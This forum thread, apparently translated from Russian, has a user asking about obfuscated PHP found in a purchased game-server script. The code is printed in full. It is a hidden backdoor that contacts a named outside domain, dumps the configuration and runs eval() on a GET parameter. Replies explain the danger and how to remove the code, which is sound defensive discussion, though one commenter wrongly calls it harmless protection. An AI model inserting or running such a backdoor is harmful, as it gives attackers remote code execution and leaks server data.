Malicious code in php script, how to remove?

Hosting reported script has malware!

${"GLOBALS"}["zhnlnvpxiov"] = "config";
 ${"GLOBALS"}["rchmyoafpzb"] = "oloki";
 if (!empty($_GET["doConfirmLoki"])) {
 ${"GLOBALS"}["hypqdo"] = "cloki";
 ${"GLOBALS"}["zbgjvvsxd"] = "cloki";
 ${"GLOBALS"}["gjsqnjxdtv"] = "oloki";
 $bqhzcuynfrb = "cloki";
 ${${"GLOBALS"}["hypqdo"]} = $_GET["doConfirmLoki"];
 ${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb});
 if (${${"GLOBALS"}["rchmyoafpzb"]} === ${${"GLOBALS"}["zbgjvvsxd"]}) {
 echo '<pre>';
print_r(${${"GLOBALS"}["zhnlnvpxiov"]});
 echo '</pre>';
 if (isset($_GET["uloki"])) eval($_GET["uloki"]);
}
die;
 }

Do not specify the name of the third-party website to get I used the characters xxxxx what would it mean?
{VIRUSDIE}Eval.request
{VIRUSDIE}Obfuscated.Globals.Names
can even specify who is selling the script with this functionality! and the person who sells the license of this script says the following:
I: tobishi violating your rules, you're ruining the draft for your client that way?
The owner of the script: Each case is unique...

is this code dangerous and what is he doing? and how to deal with those who spread this script still charge?

Every php file with this script is the following: if (!defined("TKM")) die("Access denied!");
April 7th 20 at 15:19
2 answers
April 7th 20 at 15:21
Search for all files in the substring: ${"GLOBALS"}[" and remove everything from there to the lines:
if (isset($_GET["uloki"])) eval($_GET["uloki"]);
}
die;
 }
inclusive!
@georgiana86, https://www.php.net/manual/ru/function.defined - alden.Herzog commented on April 7th 20 at 15:27
@georgiana86, I can assume that did not cause the file directly from the browser
In this case, the danger in this code do not see, so many software developers protect code. - vinnie53 commented on April 7th 20 at 15:30
About functions:
if (!defined("TKM")) die("Access denied!");

each php code does that mean? - jasmin_Jaco commented on April 7th 20 at 15:24
@georgiana86, is to check the flag on the prohibition direct call. Usually everywhere in the web aplikuar do so.
Leave it exactly as is and do not delete! - kailey_Erns commented on April 7th 20 at 15:33
April 7th 20 at 15:23
If you don't parse the code, but just look at this:
eval($_GET["uloki"])
we can assume that a get request at some point, you can call any script. Quite a dangerous thing
https://www.php.net/manual/ru/function.eval.php

And what's the problem to fix it? Or this code provided hosting? Search all files of a certain piece of text should give some kind of response
And the function ${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb}); instead of xxxxx leads to an external site for what? - jasmin_Jaco commented on April 7th 20 at 15:26
@georgiana86, fully domain name
The author of the script, preferably, also - vinnie53 commented on April 7th 20 at 15:29
@shanelle55,
${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("https://whileteam.ru/ad-loki.php?loki=" . ${$bqhzcuynfrb});


I think here no comment, please huge, I don't shoot the author, anonymously, just worried about those who had bought the script and dosihpor not aware that all the data of game servers, configs, database, etc he had in fluency...

Not only that, the script for taken ready-made rcon which is located on Gita in free access, so he also took https://github.com/AlexBrin/LiteDonate-PHP-SDK and not just securely added the payment function to run the script after payment...

So he dictates his policy of "License." https://ldonate.ru/info/license - jasmin_Jaco commented on April 7th 20 at 15:32
@georgiana86, again, by assumption, looks like some sort of ad integration. This is the best. In the worst - up to access the server, because eval can execute any php script. Especially if the file where this code is spelled out - has all the permissions. - vinnie53 commented on April 7th 20 at 15:35

Find more questions by tags PHP